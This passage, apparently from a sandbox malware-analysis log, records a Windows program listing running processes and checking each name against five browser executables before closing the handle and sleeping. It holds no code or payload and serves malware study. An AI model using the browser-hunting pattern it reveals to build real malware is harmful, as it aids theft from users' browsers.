th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0247.547] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0247.547] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0247.547] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0247.547] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0247.547] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.548] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.548] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0247.548] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0247.548] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0247.548] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0247.548] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.548] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0247.549] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0247.549] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0247.549] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0247.549] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0247.549] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.549] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0247.549] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0247.549] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0247.549] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0247.549] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0247.549] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.549] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0247.550] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0247.550] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0247.550] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0247.550] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0247.550] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.550] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0247.550] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0247.550] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0247.550] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0247.550] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0247.550] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.550] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0247.551] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0247.551] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0247.551] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0247.551] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0247.551] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.551] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0247.552] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0247.552] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0247.552] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0247.552] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0247.552] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.552] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0247.552] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0247.552] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0247.552] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0247.552] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0247.552] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.552] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0247.553] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0247.553] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0247.553] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0247.553] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0247.553] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.553] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0247.553] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0247.553] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0247.553] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0247.553] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0247.553] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.553] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0247.554] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0247.554] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0247.554] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0247.554] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0247.554] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.554] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0247.555] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0247.555] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0247.555] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0247.555] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0247.555] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.555] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0247.555] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0247.555] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0247.555] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0247.555] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0247.555] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.555] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0247.556] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0247.556] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0247.556] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0247.556] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0247.556] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.556] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0247.556] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0247.556] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0247.556] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0247.556] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0247.556] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.556] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0247.557] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0247.557] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0247.557] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0247.557] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0247.557] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.557] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0247.557] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0247.557] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0247.558] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0247.558] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0247.558] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.558] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0247.558] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0247.558] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0247.558] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0247.558] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0247.558] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.558] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0247.559] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0247.559] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0247.559] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0247.559] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0247.559] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.559] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0247.559] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0247.559] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0247.559] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0247.559] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0247.559] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.559] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0247.560] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0247.560] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0247.560] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0247.560] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0247.560] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.560] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0247.560] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0247.560] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0247.560] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0247.560] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0247.560] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.560] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0247.561] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0247.561] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0247.561] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0247.561] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0247.561] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.561] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0247.562] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0247.562] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0247.562] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0247.562] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0247.562] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.562] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.562] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0247.562] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0247.562] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0247.562] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0247.562] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.562] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0247.563] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0247.563] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0247.563] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0247.563] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0247.563] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.563] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.563] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0247.563] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0247.563] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0247.563] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0247.563] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.563] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0247.564] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0247.564] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0247.564] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0247.564] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0247.564] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.564] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.564] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0247.564] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0247.564] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0247.564] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0247.565] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.565] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0247.565] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0247.565] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0247.565] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0247.565] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0247.565] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.565] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0247.566] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0247.566] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0247.566] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0247.566] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0247.566] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.566] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.566] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0247.566] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0247.566] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0247.566] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0247.566] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.567] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.567] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0247.567] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0247.567] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0247.567] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0247.567] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.567] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.568] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0247.568] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0247.568] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0247.568] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0247.568] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.568] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.568] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0247.568] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0247.568] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0247.568] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0247.568] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.568] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0247.569] CloseHandle (hObject=0xe8) returned 1 [0247.569] Sleep 